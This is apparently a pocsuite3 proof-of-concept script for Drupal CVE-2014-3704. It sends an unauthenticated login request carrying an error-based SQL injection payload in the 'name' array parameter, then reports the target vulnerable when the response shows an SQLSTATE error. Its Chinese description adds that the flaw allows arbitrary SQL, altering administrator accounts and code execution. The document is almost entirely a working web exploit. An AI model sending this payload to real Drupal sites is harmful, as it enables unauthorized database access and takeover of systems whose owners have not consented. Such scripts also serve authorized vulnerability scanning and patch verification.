drupal_CVE-2014-3704.py

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE

class DemoPOC(POCBase):
    vulID = '002'  # ssvid
    version = '1.0'
    name = 'Drupal SQL Inject'
    appName = 'Drupal'
    appVersion = '7.0~7.31'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''Drupal 是一款用量庞大的CMS，其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞，攻击者可以执行任意SQL语句，插入、修改管理员信息，甚至执行任意代码。'''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.WEBAPP

    def _verify(self):
        result = {}
        try:
            headers = {
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'Accept-Language': 'en',
                'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
                'Connection': 'close',
                'Content-Type': 'application/x-www-form-urlencoded',
                'Content-Length': '120',
            }
            target = self.url+"/?q=node&destination=node"
            data = "pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a"
            r = requests.post(url=target,timeout=8,verify=False,headers=headers,data=data)
            if r.status_code == 500 and "SQLSTATE" in r.text:
                result['FileInfo'] = {}
                result['FileInfo']['URL'] = target
                result['FileInfo']['POC'] = data
                return self.parse_verify(result)
        except:
            return
    def parse_verify(self,result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

register_poc(DemoPOC)